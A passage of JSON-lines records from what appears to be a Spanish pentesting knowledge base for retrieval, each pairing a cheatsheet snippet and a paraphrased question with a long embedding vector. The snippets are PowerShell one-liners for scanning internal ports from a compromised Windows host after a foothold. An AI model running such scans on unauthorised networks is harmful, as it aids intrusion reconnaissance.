"fuente": null, "licencia": null, "texto": "# Port scanner en PowerShell\n\n> Escanear puertos **desde la vΓ­ctima Windows sin nmap** (ΓΊtil tras un foothold para mirar la red interna, antes de montar Pivoting ligolo-ng). Usa Operadores PowerShell.", "indexar": "quΓ© alternativa a Nmap existe en PowerShell para hacer el anΓ‘lisis de la red interna despuΓ©s de conseguir acceso?", "v": [-0.22402, 0.11424, -0.07151, -0.06173, -0.06099, -0.02169, -0.06122, -0.02195, -0.1833, 0.0573, -0.13765, -0.1201, -0.0136, -0.07093, 0.06458, 0.06625, -0.04879, 0.01003, 0.10778, 0.04485, -0.16958, -0.03569, -0.21307, -0.04588, -0.03861, 0.10538, -0.07361, 0.09801, -0.08987, 8e-05, -0.07625, -0.03216, -0.00488, -0.07776, -0.14789, 0.06942, 0.07599, 0.05532, 0.02251, 0.06057, -0.1239, 0.0766, -0.04491, 0.06171, 0.06809, -0.06354, -0.07188, -0.0357, 0.00462, -0.03773, -0.10036, -0.03476, -0.14339, -0.12383, 0.04411, -0.10802, 0.03637, -0.13809, -0.05881, -0.07536, -0.11192, 0.0561, -0.00516, 0.02162, 0.00813, -0.04236, -0.08002, -0.00458, -0.02873, 0.15443, -0.07893, 0.01589, -0.05977, -0.06138, -0.04, 0.02429, 0.01115, 0.03947, -0.00132, 0.0252, 0.00832, 0.03369, -0.15343, -0.00163, -0.04881, -0.04183, 0.08391, -0.11785, -0.04196, -0.09214, 0.05506, 0.01434, 0.02514, 0.10661, 0.0102, -0.07278, -0.064, -0.02115, -0.02931, -0.04244, 0.0347, -0.003, -0.11495, -0.02688, 0.07004, 0.04053, 0.06423, 0.01007, -0.0435, 0.04423, -0.02061, 0.0373, -0.05726, -0.01746, 0.02712, -0.09053, -0.02274, 0.01281, -0.12655, -0.04686, -0.0446, 0.03006, -0.09336, -0.05814, -0.05174, 0.0391, 0.01486, -0.0225, 0.0327, -0.00692, 0.02499, -0.0195, -0.00983, -0.07366, -0.09878, -0.05817, -0.04037, -0.06928, 0.0034, -0.06285, -0.00119, 0.00386, -0.03904, -0.09488, -0.09175, 0.01681, -0.01985, -0.02905, -0.00647, 0.07857, -0.07483, -0.0044, -0.07857, 0.0616, 0.0101, 0.03482, -0.03372, -0.01704, -0.0943, 0.09617, -0.05097, -0.03812, -0.05035, 0.04447, 0.01068, -0.01968, -0.04571, -0.08922, 0.01768, -0.01399, 0.0045, 0.06889, 0.00155, -0.07853, 0.06279, -0.08083, 0.02877, -0.12546, -0.00012, -0.06376, 0.03486, -0.00552, -0.03124, -0.03526, -0.01732, 0.02588, 0.00722, -0.04816, -0.03008, -0.01072, -0.03456, -0.00726, 0.03456, -0.01294, 0.03495, -0.03366, 0.08204, -0.07617, -0.04928, -0.05044, -0.09146, -0.01289, -0.03959, -0.00553, -0.00548, 0.01092, 0.00587, 0.03546, -0.02542, 0.02928, 0.09216, 0.03641, 0.10449, 0.02738, -0.06694, -0.02013, 0.03134, -0.00906, 0.00418, 0.00371, 0.04703, 0.02543, -0.0306, 0.07576, 0.01375, -0.00031, -0.01463, -0.03474, -0.01276, 0.0615, 0.07176, 0.02009, 0.0149, 0.04079, -0.01703, -0.06934, -0.00896, 0.03918, 0.01594, -0.00326, 0.02802, 0.0232, -0.0192, 0.06733, 0.00256, 0.00411, -0.06141, 0.01562, -0.01197, -0.05249, -0.0057, 0.0097, 0.03502, 0.01469, 0.09898, -0.01891]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Con timeout (NO se cuelga)\n```powershell\n1..200 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"Puerto $_ ABIERTO\"}; $c.Close() }\n```", "indexar": "que herramienta sirve para comprobar si un puerto estΓ‘ abierto sin que se cuelgue?", "v": [-0.10839, -0.00554, -0.2827, -0.13587, 0.07168, -0.17218, 0.0373, -0.12142, 0.00944, -0.22824, -0.08224, 0.07666, 0.04612, -0.10305, 0.01216, -0.0134, 0.00227, -0.03409, 0.0135, 0.06686, -0.00805, 0.08118, -0.08602, -0.18428, -0.00197, 0.02189, -0.00824, -0.01964, -0.14067, 0.00534, -0.05483, 0.00284, 0.06532, -0.0709, -0.01342, -0.08842, 0.06833, 0.00252, 0.0456, 0.06367, 0.04037, -0.00313, -0.04181, 0.14469, 0.01594, -0.02919, -0.02996, 0.00493, -0.0249, 0.12205, -0.0018, -0.11526, -0.06597, 0.01574, -0.05584, -0.05325, 0.13036, 0.00459, 0.04614, -0.19081, -0.05916, -0.04194, 0.02824, -0.09311, 0.00195, -0.05752, 0.05302, 0.07564, -0.04645, -0.01228, -0.09347, 0.00931, -0.00343, 0.03101, -0.12068, -0.13812, 0.01623, 0.05769, 0.02636, 0.00994, 0.05617, 0.03676, 0.00655, -0.03463, -0.026, -0.12005, 0.0135, -0.05743, 0.0734, -0.14552, 0.01238, 0.05848, -0.00361, 0.09618, -0.00196, 0.01984, -0.00771, -0.0626, -0.01315, 0.00314, 0.18144, -0.00936, -0.09173, -0.01404, -0.04598, 0.04157, -0.08557, -0.07805, -0.01085, 0.01935, 0.14649, 0.03421, 0.02428, -0.04589, -0.06493, 0.02928, -0.07609, -0.08775, -0.07753, -0.03609, 0.04193, -0.05485, -0.10161, -0.03178, -0.02961, 0.01266, -0.01453, 0.05333, 0.06303, -0.01409, 0.02562, -0.07033, -0.10848, 0.02442, -0.0157, -0.1093, -0.03243, -0.121, -0.04301, -0.0064, -0.04222, 0.08669, -0.01977, -0.06792, 0.05844, 0.01817, -0.00563, -0.03248, -0.06651, -0.02522, -0.0153, 0.00538, 1e-05, 0.06734, -0.07732, 0.05681, 0.06093, 0.01844, -0.09778, 0.01576, -0.01893, -0.04887, -0.03313, 0.02361, 0.02657, -0.04446, -0.02985, -0.00432, 0.11866, -0.00776, 0.02288, 0.04954, 0.01447, -0.03986, -0.00207, -0.02461, -0.04412, 0.01936, -0.05762, -0.09463, -0.05401, -0.01047, -0.05112, -0.05576, -0.02219, -0.0851, 0.0395, -0.07369, -0.02273, 0.06118, -0.02227, -0.01046, -0.00829, -0.0617, 0.01536, 0.05901, 0.00045, -0.00619, 0.02194, -0.01882, -0.00049, 0.03365, 0.00668, -0.02506, 0.04276, 0.08343, -0.03284, 0.02987, 0.00373, 0.07051, -0.00094, 0.0159, 0.02789, -0.02125, 0.01417, -0.00522, -0.02696, 0.03584, -0.01158, 0.04275, -0.0196, -0.00143, 0.02713, 0.01423, 0.01299, 0.05652, 0.0094, 0.01935, 0.06017, -0.00991, 0.03721, -0.02579, -0.02381, 0.02657, -0.02271, -0.06175, 0.00411, -0.0007, -0.0616, -0.05772, 0.00092, -0.00103, -0.00978, -0.0689, 0.00729, -0.02656, -0.01177, -0.04494, -0.01733, -0.06737, -0.08561, 0.05233, 0.05299, -0.04359, 0.03355, 0.00509]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Con timeout (NO se cuelga)\n```powershell\n1..200 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"Puerto $_ ABIERTO\"}; $c.Close() }\n```", "indexar": "con quΓ© puedo verificar rΓ‘pidamente la disponibilidad de un puerto en una IP especΓ­fica?", "v": [-0.07864, 0.17748, -0.30606, -0.07854, 0.07865, -0.1227, 0.15139, -0.10746, -0.20213, -0.12056, 0.12189, 0.01509, 0.01858, -0.08676, -0.00463, 0.0243, 0.00738, 0.00851, 0.08172, -0.02563, 0.0189, -0.02253, -0.10547, -0.06292, -0.01394, 0.12915, -0.09714, 0.08884, -0.13193, -0.11437, -0.11377, -0.01527, -0.04158, -0.00845, -0.09247, -0.07452, 0.10802, 0.14212, 0.04145, -0.00739, 0.07143, 0.0326, 0.01555, 0.00615, 0.12244, 0.00955, -0.00404, -0.05752, -0.00525, -0.03329, -0.06347, 0.00266, -0.02391, -0.00194, -0.16762, 0.0636, 0.02842, 0.02731, 0.06188, -0.00717, -0.04673, 0.02845, -0.04646, -0.07888, 0.02201, -0.00703, -0.04365, 0.08241, -0.05619, -0.08701, -0.05036, -0.00076, 0.00996, 0.04143, -0.00423, -0.03502, -0.05341, 0.01581, 0.08904, 0.03741, 0.02966, 0.12842, -0.02926, -0.04253, -0.09318, -0.08749, -0.00099, -0.16161, 0.06842, -0.10259, 0.08323, 0.05351, -0.03614, 0.07905, -0.00808, 0.02921, 0.01633, 0.10113, -0.0679, 0.04612, 0.06321, 0.00367, -0.0893, 0.07616, 0.03353, 0.02204, -0.00179, -0.0221, 0.00989, -0.0207, 0.02076, -0.01794, -0.07852, -0.10618, 0.00375, -0.02923, -0.05174, -0.12544, 0.01329, 0.03303, -0.05205, -0.08906, -0.02133, -0.00505, 0.0497, 0.0306, 0.00532, 0.08621, 0.05844, 0.03414, 0.03369, -0.06064, -0.12764, -0.0671, -0.01702, 0.0029, -0.03194, -0.05927, -0.01137, 0.01477, -0.01761, -0.06697, 0.01461, -0.02788, 0.09668, 0.00791, -0.08294, -0.0527, -0.1067, -0.01454, -0.01021, -0.00325, 0.00976, 0.0789, -0.06684, 0.04485, 0.03716, -0.01039, 0.00052, 0.01928, 0.05893, 0.02119, -0.05995, 0.03128, -0.00112, 0.01435, -0.08304, 0.02022, 0.06672, -0.02874, -0.06083, 0.03982, -0.06901, -0.05943, -0.00317, 0.02343, -0.06126, -0.02291, -0.02829, -0.05056, -0.07388, -0.01218, -0.05315, -0.06083, -0.05449, -0.05127, 0.04396, -0.01588, 0.02055, 0.04534, 0.06728, 0.0246, -0.00773, 0.04017, 0.00048, 0.02555, -0.04184, 0.00868, -0.02933, -0.046, -0.02916, -0.01588, -0.01033, -0.04551, 0.0542, 0.02996, -0.07502, 0.02279, -0.00107, 0.02649, -0.00678, 0.03101, 0.10382, -0.04288, -0.05167, 0.01892, 0.03028, -0.00039, 0.00279, -0.01555, -0.01444, 0.04433, 0.00202, 0.03066, 0.01107, 0.01761, 0.02813, 0.05189, 0.06036, 0.09983, -0.01616, 0.04608, -0.06666, -0.03158, 0.04413, 0.03037, -0.00335, -0.03431, -0.02032, -0.03177, 0.03501, 0.0365, -0.00475, -0.04496, 0.03792, -0.03084, -0.12818, 0.04085, -0.02406, -0.0509, -0.03825, 0.04296, 0.03087, -0.04597, 0.01571, -0.01477]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Con timeout (NO se cuelga)\n```powershell\n1..200 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"Puerto $_ ABIERTO\"}; $c.Close() }\n```", "indexar": "cual es una alternativa a los comandos largos de PowerShell para testear conectividad?", "v": [0.18977, -0.0007, -0.03149, -0.06463, -0.01022, -0.0446, 0.05962, -0.03387, -0.03653, -0.00563, -0.22348, 0.0041, -0.08113, -0.00053, 0.0473, 0.07268, 0.14846, -0.03973, -0.00139, -0.10652, 0.03168, -0.06798, -0.17327, -0.10493, 0.05312, 0.09691, 0.02723, 0.0637, -0.14155, -0.07364, -0.07832, -0.00319, 0.09867, 0.02515, -0.12035, 0.13457, -0.06815, 0.13682, 0.10126, 0.2044, -0.06329, -0.01252, -0.08596, -0.00716, -0.01584, -0.10506, 0.00037, -0.05584, 0.0668, -0.02584, -0.12429, 0.00144, -0.13214, 0.01903, -0.0255, -0.05133, 0.118, -0.05005, -0.04636, -0.0359, -0.07132, -0.00992, 0.0425, 0.04327, -0.01927, 0.00057, -0.09718, -0.11454, -0.15709, 0.04242, -0.05524, 0.10771, -0.03856, -0.0172, -0.00483, 0.04843, 0.07479, -0.06462, 0.07122, 0.03396, 0.04963, -0.00275, -0.02309, 0.05135, -0.10514, -0.01843, -0.04397, -0.09714, -0.04015, 0.00267, 0.07585, 0.02958, -0.02107, 0.05239, 0.02459, -0.03947, 0.03726, -0.02059, 0.0478, -0.06826, 0.04991, -0.02533, -0.11516, 0.11852, 0.05671, -0.00748, 0.00351, 0.00835, -0.00399, 0.00605, -0.0129, -0.00976, 0.02818, -0.00527, -0.03041, -0.04679, -0.04149, -0.10105, -0.11125, -0.04798, -0.10658, 0.04022, -0.01075, 0.05393, 0.04584, 0.05263, 0.03826, -0.03049, 0.07221, 0.06918, 0.05257, -0.001, 0.09935, -0.09932, -0.09294, 0.06419, 0.02993, -0.03463, -0.05603, -0.10598, 0.03154, 0.0696, 0.01258, -0.01026, 0.02133, -0.04856, -0.02632, 0.03459, -0.05366, 0.06971, -0.0488, 0.05531, -0.09717, 0.07195, -0.06075, -0.01221, -0.01285, -0.00073, -0.03576, 0.06282, -0.09825, -0.03356, 0.00121, 0.01703, 0.02918, -0.02369, -0.04921, -0.05044, -0.02053, 0.00386, 0.00883, 0.06832, -0.03928, 0.0117, 0.05682, 0.01696, 0.00885, -0.02391, 0.00098, -0.08666, -0.00485, 0.06628, -0.10752, -0.04703, 0.00396, 0.02197, -0.04451, -0.0373, 0.06255, -0.02364, -0.02075, 0.04245, 0.00643, -0.03109, 0.06524, -0.05872, 0.07279, -0.08606, -0.06431, -0.01228, -0.10035, 0.03417, -0.06572, -0.02303, 0.05745, 0.02673, -0.00539, 0.03883, 0.02103, 0.00197, 0.09638, -0.01139, 0.14857, -0.00859, -0.04345, -0.05397, 0.01793, -0.03379, -0.02669, 0.00743, -0.03716, -0.00798, -0.00285, 0.03793, 0.03434, 0.09922, -0.00473, -0.01568, -0.00902, 0.00444, 0.02896, 0.0032, -0.03041, -0.00407, 0.04077, -0.0061, -0.03407, 0.0362, 0.0096, -0.03217, -0.01359, 0.05777, -0.02946, 0.00247, -0.04948, -0.00503, -0.11492, -0.02466, -0.08311, -0.05396, -0.00704, 0.02863, 0.01873, -0.06031, 0.02972, -0.01912]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Solo puertos concretos (instantΓ‘neo)\n```powershell\n53,88,135,139,445 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"$_ ABIERTO\"}; $c.Close() }\n```", "indexar": "ΒΏQuΓ© programa me permite comprobar quΓ© puertos estΓ‘n abiertos en una IP concreta?", "v": [-0.04639, 0.10403, -0.18644, -0.04093, 0.19535, -0.17276, 0.20867, -0.14891, -0.19121, -0.20956, 0.04189, 0.11028, 0.0517, -0.08762, -0.02848, -0.03894, 0.03386, -0.03368, 0.10337, 0.00129, 0.00749, 0.02216, -0.11372, -0.12537, 0.00978, 0.03485, -0.02822, 0.02785, -0.062, -0.0966, -0.08902, -0.01516, 0.03522, -0.02565, -0.01663, -0.1244, 0.07533, 0.04722, 0.08622, 0.00117, 0.10691, -0.00759, 0.02879, -0.04108, 0.13337, 0.00798, -0.02223, -0.11658, -0.02539, -0.06051, -0.08744, 0.0061, 0.00943, -0.00399, -0.06156, 0.01612, -0.0158, 0.05627, 0.04081, -0.07891, -0.00765, 0.07671, -0.00689, -0.07284, 0.04411, -0.07821, 0.00063, 0.06988, -0.06354, -0.02682, -0.0506, -0.03592, -0.0163, 0.11859, -0.03346, -0.07882, -0.01735, -0.03673, 0.02706, 0.00336, 0.0534, 0.0524, 0.01887, -0.00324, 0.00669, -0.04061, -0.05162, -0.0819, -0.02685, -0.11827, 0.05106, 0.06611, 0.02901, 0.17318, -0.00609, -0.03186, 0.06102, 0.07291, -0.03939, 0.04839, 0.02313, 0.04642, -0.12515, 0.0958, -0.02356, 0.10945, 0.01005, -0.03394, -0.0181, 0.04918, 0.03541, 0.04416, -0.03585, -0.08385, -0.04604, 0.02214, -0.02245, -0.09837, -0.02717, -0.05364, -0.05569, 0.00803, -0.07211, 0.02159, 0.04662, 0.0325, -0.02132, 0.14476, -0.00211, 0.09383, 0.05256, -0.01813, -0.05271, -0.06152, -0.04649, -0.10605, 0.00236, -0.08369, 0.0126, 0.02151, -0.04537, 0.01364, -0.02986, 0.02598, 0.0468, -0.0775, -0.04916, -0.04158, -0.09386, 0.01109, 0.01994, 0.04317, -0.023, 0.0847, -0.09263, 0.06401, 0.09351, -0.04701, -0.08414, 0.04769, -0.01649, -0.01356, -0.04218, -0.06329, 0.07422, -0.01008, -0.05019, 0.01776, 0.09993, 0.04219, -0.02745, 0.08073, -0.03895, -0.03868, -0.00495, -0.01262, -0.01446, -0.05584, -0.01408, -0.07011, -0.09568, 0.06841, 0.05533, -0.0139, -0.02732, -0.04568, -0.00534, -0.00827, -0.0007, 0.06747, 0.0417, 0.00283, -0.0147, -0.02996, 0.01176, -0.02663, -0.03017, 0.01138, -0.00272, -0.05375, -0.03813, -0.01803, 0.0167, -0.05393, 0.02683, 0.08871, -0.05906, 0.03047, 0.0296, 0.08885, -0.02425, -0.02019, 0.0911, -0.00915, -0.05984, 0.05122, -0.01284, 0.0681, 0.04876, 0.02978, -0.03589, 0.01556, 0.01208, 0.0099, 0.03035, -0.01146, 0.04153, 0.03823, 0.05603, 0.04043, 0.00509, -0.01274, -0.07506, -0.05234, 0.02109, -0.01531, -0.02747, -0.00496, 0.00968, -0.04468, 0.0146, 0.0429, 0.00649, -0.0723, 0.01688, -0.0291, -0.06204, 0.04738, 0.00066, -0.02566, -0.10357, 0.0581, 0.01366, -0.04614, 0.03313, -0.00457]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Solo puertos concretos (instantΓ‘neo)\n```powershell\n53,88,135,139,445 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"$_ ABIERTO\"}; $c.Close() }\n```", "indexar": "Con quΓ© herramienta puedo verificar si un puerto especΓ­fico estΓ‘ disponible de forma instantΓ‘nea?", "v": [0.04554, 0.23736, -0.26123, -0.08047, 0.11215, -0.11157, 0.07742, -0.1496, -0.13028, -0.14047, -0.0372, 0.02868, -0.01626, -0.05204, 0.03195, 0.1147, 0.03337, -0.05691, 0.02233, 0.00894, 0.01563, -0.16891, -0.08011, -0.11955, -0.01329, 0.05511, -0.03073, 0.04533, -0.14894, -0.05418, -0.01216, -0.01789, 0.05977, -0.0072, -0.11434, -0.10037, 0.06526, 0.06252, 0.01014, 0.03563, 0.02134, 0.06553, 0.02409, 0.05463, 0.11358, -0.009, -0.01816, -0.01492, -0.03497, 0.08594, 0.06126, -0.0281, -0.12616, 0.02501, -0.14393, -0.11077, 0.16259, -0.05804, 0.06672, -0.07952, -0.02015, 0.03358, -0.07529, -0.05438, -0.01905, 0.04923, 0.00928, 0.00117, -0.07344, -0.07268, -0.07502, -0.01426, 0.10141, 0.01672, -0.03616, -0.0194, -0.04105, 0.06044, 0.05379, -0.00146, 0.07265, 0.04726, -0.00014, -0.0144, -0.06358, -0.1346, -0.02245, -0.09684, 0.04308, -0.1321, 0.03066, 0.01525, 0.00921, 0.08008, -0.04014, 0.01842, -0.00993, 0.00151, -0.0395, 0.04215, 0.11325, -0.01962, -0.12219, 0.07923, -0.05196, -0.03868, -0.1289, -0.04501, -0.0794, 0.01069, 0.10803, -0.02235, -0.05952, -0.04378, 0.03775, 0.01815, -0.0526, -0.14362, 0.00971, -0.01323, 0.01306, -0.02277, -0.0539, -0.02282, 0.01922, -0.01773, -0.06241, 0.08132, 0.04505, -0.02136, 0.02802, -0.04123, -0.11301, -0.06531, -0.03768, -0.01132, -0.02813, -0.13453, -0.0122, -0.07678, -0.03864, -0.00367, -0.00474, -0.09312, 0.06033, 0.01567, -0.05959, -0.03129, -0.08859, -0.00875, 0.06328, -0.05082, -0.02963, 0.05141, -0.03234, 0.01145, 0.00908, 0.02576, -0.06083, 0.00402, -0.01331, -0.04644, -0.03607, 0.00587, 0.01884, -0.04394, -0.00686, 0.03513, 0.07799, 0.03829, -0.0071, 0.05183, 0.01545, -0.03451, -0.01506, -0.02467, -0.05071, -0.0249, -0.02169, -0.0899, -0.09609, 0.0509, -0.04553, -0.09042, -0.06869, -0.12015, 0.00803, -0.03055, 0.0248, 0.08879, 0.01007, 0.03629, 0.00698, -0.02607, 0.03663, 0.04151, -0.02878, 0.00663, 0.00778, -0.01779, -0.05059, -7e-05, 0.00425, -0.07706, 0.0481, 0.06971, -0.06677, 0.00861, -0.00566, 0.01924, 0.00413, 0.01261, 0.07379, -0.02507, -0.00774, -0.00089, 0.0, -0.00734, -0.00895, -0.01436, -0.00133, 0.01267, 0.05661, 0.03307, 0.0111, 0.03858, 0.0198, 0.0312, 0.01945, 0.06553, 0.03286, 0.01306, -0.04746, -0.04307, 0.02682, -0.00115, 0.0337, -0.03329, -0.06196, -0.03586, 0.0554, 0.05685, -0.00365, 0.00773, -0.00607, -0.00683, -0.05418, 0.01294, -0.04737, -0.07979, -0.02997, -0.00393, 0.06646, -0.09596, 0.01224, -0.02061]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Test rΓ‘pido de un puerto\n```powershell\nTest-NetConnection IP -Port 53 -wa 0 -ea 0 # mira TcpTestSucceeded : True/False\n```", "indexar": "que comando PowerShell sirve para verificar si un servicio corre en un puerto?", "v": [-0.05, -0.00463, -0.23449, -0.13095, -0.02408, -0.15821, 0.16819, -0.0699, 0.0202, -0.16294, -0.16632, 0.03734, 0.057, -0.12432, 0.00439, 0.00634, 0.0362, 0.00732, 0.06725, 0.05963, 0.01602, -0.00544, 0.0109, -0.15077, 0.00858, 0.18325, 0.00434, 0.00667, -0.17974, -0.0765, -0.01258, -0.00226, 0.06739, -0.04846, -0.06676, -0.00492, -0.06534, 0.07754, 0.07156, 0.21712, -0.09089, 0.07696, -0.04202, 0.0156, 0.01314, -0.06488, 0.04593, -0.09067, 0.06255, -0.00345, -0.01073, -0.01681, -0.08902, 0.02784, -0.08066, 0.02278, -0.03161, -0.02961, -0.03127, -0.08507, -0.07032, -0.12875, -0.00374, 0.03229, -0.04854, 0.00862, -0.05891, -0.10096, -0.05271, -0.03942, -0.14152, 0.03568, -0.01312, 0.03074, -0.04673, -0.078, 0.03511, 0.02781, 0.1151, -0.01539, 0.0054, 0.07483, -0.10227, 0.0123, -0.09836, -0.05521, -0.07094, -0.14072, 0.03432, -0.04259, 0.06714, 0.08703, 0.00897, 0.11654, 0.0027, 0.08089, -0.00558, 0.05714, 0.06349, 0.05398, 0.13013, -0.05085, -0.08715, 0.05931, 0.03057, 0.05435, 0.03544, -0.05661, 0.00141, 0.00578, 0.01872, -0.07637, 0.02606, -0.03783, -0.03272, -0.0642, -0.08539, -0.1754, -0.04198, -0.01671, -0.09095, -0.05263, 0.03289, 0.07445, 0.00204, 0.00661, 0.02908, 0.01149, 0.15172, 0.01624, 0.01526, -0.03148, -0.02789, -0.06705, -0.02255, 0.01314, -0.01231, -0.02, -0.05747, -0.06107, 0.00761, 0.11441, -0.00297, -0.00094, 0.0626, 0.02835, -0.00128, -0.0243, -0.05554, 0.06821, 0.00279, 0.05968, -0.07263, 0.11644, -0.0181, -0.02869, 0.03517, -0.05699, -0.02847, 0.01299, -0.02305, -0.03599, -0.00253, 0.05891, 0.00502, -0.03695, -0.06703, -0.01509, 0.07869, -0.04357, -0.0492, 0.04885, -0.05513, -0.02801, 0.03591, -0.00674, -0.03017, -0.01244, -0.02972, 0.01473, -0.05871, 0.02547, -0.05951, -0.0284, -0.08078, 0.00755, -0.00674, -0.0611, 0.00904, 0.02637, 0.03315, -0.0015, -0.01111, -0.05627, 0.02685, 0.00798, 0.02187, 0.00202, -0.03357, -0.06427, -0.07002, 0.04676, -0.03657, -0.02988, 0.04349, 0.00889, 0.00128, 0.06936, -0.00013, 0.00808, 0.01997, 0.02801, 0.09496, -0.02599, -0.07994, -0.0429, 0.05728, -0.02185, -0.02812, 0.04179, -0.03932, -0.0071, -0.032, 0.03969, 0.02254, 0.03406, 0.02396, -0.00557, 0.05346, 0.08394, -0.00745, 0.0234, -0.04676, 0.00434, 0.0302, 0.00171, 0.01906, 0.02926, -0.01943, -0.07089, 0.02818, 0.04676, -0.03759, -0.05682, -0.0025, -0.03845, -0.10012, 0.00912, -0.02784, -0.04254, -0.01173, 0.02866, 0.01594, -0.03943, 0.02939, -0.05734]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Test rΓ‘pido de un puerto\n```powershell\nTest-NetConnection IP -Port 53 -wa 0 -ea 0 # mira TcpTestSucceeded : True/False\n```", "indexar": "con que puedo comprobar rΓ‘pidamente si el puerto 53 estΓ‘ abierto?", "v": [-0.0723, 0.1068, -0.27562, -0.0361, 0.01939, 0.01387, 0.1909, -0.05134, -0.11355, -0.25078, -0.03648, 0.13407, 0.03102, -0.02502, -0.01516, -0.06355, -0.03344, 0.08346, 0.03407, 0.0489, 0.05258, -0.04726, -0.08553, -0.18917, 0.17495, 0.04111, -0.05916, 0.05416, -0.06548, -0.04751, -0.07119, 0.05339, 0.0261, 0.07364, -0.00654, -0.02809, 0.08792, 0.01006, 0.09524, 0.04648, 0.06007, 0.03513, 0.02924, 0.04513, 0.08764, -0.05029, -0.05764, -0.0841, -0.0384, -0.01573, -0.00673, -0.03657, -0.0331, 0.00733, -0.12416, 0.02702, 0.03843, 0.11506, 0.05326, -0.10238, 0.05806, -0.01922, 0.02875, -0.09006, 0.01297, -0.03331, 0.07968, 0.13028, -0.05799, -0.01289, -0.11249, -0.0064, -0.0209, 0.11603, -0.07375, -0.1102, -0.05483, 0.01887, 0.04656, 0.08241, -0.00216, -0.00576, 0.04575, -0.03805, -0.02517, -0.08119, -0.1055, -0.05429, 0.03989, -0.11911, 0.08366, -0.04806, 0.02446, 0.1263, -0.03715, 0.00946, -0.02149, 0.04436, -0.02319, 0.01717, 0.02671, 0.05208, -0.09105, 0.02846, -0.01435, 0.04443, -0.07, -0.07153, 0.02332, 0.04957, 0.05717, 0.00245, 0.0054, -0.12281, -0.04833, -0.02587, -0.12931, -0.07051, -0.06019, 0.04368, -0.00246, -0.09722, -0.06929, -0.00148, 0.0061, -0.0188, 0.02029, 0.03185, 0.08743, 0.03754, 0.00136, -0.05089, -0.10431, -0.01502, -0.0013, -0.05385, -0.04292, -0.06891, -0.01873, -0.00518, -0.07748, 0.03672, 0.01699, -0.00948, 0.06117, 0.02143, -0.08907, -0.0412, -0.11227, -0.0253, -0.01489, 0.05091, -0.04781, 0.08717, -0.03847, 0.05256, 0.1306, -0.02549, 0.01861, 0.01545, -0.01185, 0.03855, -0.10838, 0.04098, -0.04641, -0.02941, -0.06692, 0.01129, 0.04933, -0.05171, -0.02621, 0.06845, -0.08112, -0.04309, 0.0407, 0.00762, -0.04186, -0.01211, -0.05063, -0.07939, -0.05022, 0.01398, -0.06294, -0.06667, -0.06438, -0.07248, 0.0597, -0.04376, -0.00794, 0.06227, 0.01016, 0.01895, -0.00751, 0.0067, -0.0077, 0.05923, -0.01556, 0.027, -0.0403, -0.07512, -0.01194, 0.02733, 0.00467, -0.05968, -0.01468, 0.01761, -0.03875, 0.09422, -0.01664, 0.04025, 0.00974, -0.00467, 0.08462, -0.01344, -0.01622, 0.03032, -0.05055, -0.00368, 0.00018, 0.00637, -0.00987, 0.06546, 0.04156, 0.00915, 0.02762, 0.01333, 0.0311, 0.02652, 0.07849, 0.06078, 0.00123, 0.03881, -0.02489, -0.03089, 0.00618, 0.01728, 0.00756, 0.00521, -0.03996, -0.02234, 0.04828, 0.0078, -0.01816, -0.03048, 0.021, -0.0056, -0.05503, 0.00861, -0.01435, -0.06923, -0.09641, 0.07757, 0.04383, -0.07559, 0.00209, -0.0427]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Test rΓ‘pido de un puerto\n```powershell\nTest-NetConnection IP -Port 53 -wa 0 -ea 0 # mira TcpTestSucceeded : True/False\n```", "indexar": "cual es una alternativa a tcping en Linux usando PowerShell?", "v": [-0.07618, 0.01156, -0.08611, -0.08223, -0.02752, -0.13088, -0.08922, 0.0264, -0.00805, 0.10481, -0.10199, -0.02307, -0.01173, 0.02708, -0.00682, -0.0958, -0.08251, -0.14056, 0.13627, -0.12784, -0.13261, 0.10322, -0.24095, -0.06961, 0.07807, 0.05042, 0.0179, -0.05711, -0.05285, -0.00373, -0.049, -0.03421, 0.03367, 0.05846, -0.10892, 0.14871, 0.02489, 0.116, 0.1436, 0.1392, 0.02319, -0.02652, -0.07904, 0.03968, -0.03422, -0.1285, 0.02359, -0.12442, 0.05944, -0.13052, -0.10345, -0.02576, 